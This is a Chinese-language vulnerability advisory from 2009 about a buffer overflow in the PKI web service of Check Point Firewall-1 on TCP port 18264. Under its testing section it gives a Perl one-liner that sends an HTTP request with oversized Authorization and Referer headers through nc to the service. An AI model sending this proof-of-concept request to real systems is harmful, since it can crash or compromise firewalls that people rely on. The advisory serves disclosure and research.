发布日期：2009-03-30
更新日期：2009-03-31

受影响系统：

Check Point Software Firewall-1

描述：

---

BUGTRAQ  ID: 34286

Check Point Firewall-1是一款高性能防火墙。

Check Point Firewall-1中默认监听于TCP 18264端口上的PKI Web服务存在缓冲区溢出漏洞。如果远程攻击者向该服务发送了包含有超长Authorization或Referer头的特制HTTP请求的话，就可以触发这个溢出，导致执行任意代码。

<*来源：BugsNotHugs （bugsnothugs@gmail.com）
  
  链接：http://marc.info/?l=full-disclosure&m=123840106425398&w=2
*>

测试方法：

---

警 告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！

perl -e 'print "GET / HTTP/1.0\r\nAuthorization: Basic" . "x" x 8192 .
"\r\nFrom: bugs@hugs.com\r\nIf-Modified-Since: Fri, 13 Dec 2006
09:12:58 GMT\r\nReferer: http://www.owasp.org/" . "x" x 8192 .
"\r\nUserAgent: FsckResponsibleDisclosure 1.0\r\n\r\n"' | nc
suckit.com 18264

建议：

---

厂商补丁：

Check Point Software
--------------------
目前厂商还没有提供补丁或者升级程序，我们建议使用此软件的用户随时关注厂商的主页以获取最新版本：

http://www.checkpoint.com

浏览次数：2960
严重程度：0（网友投票）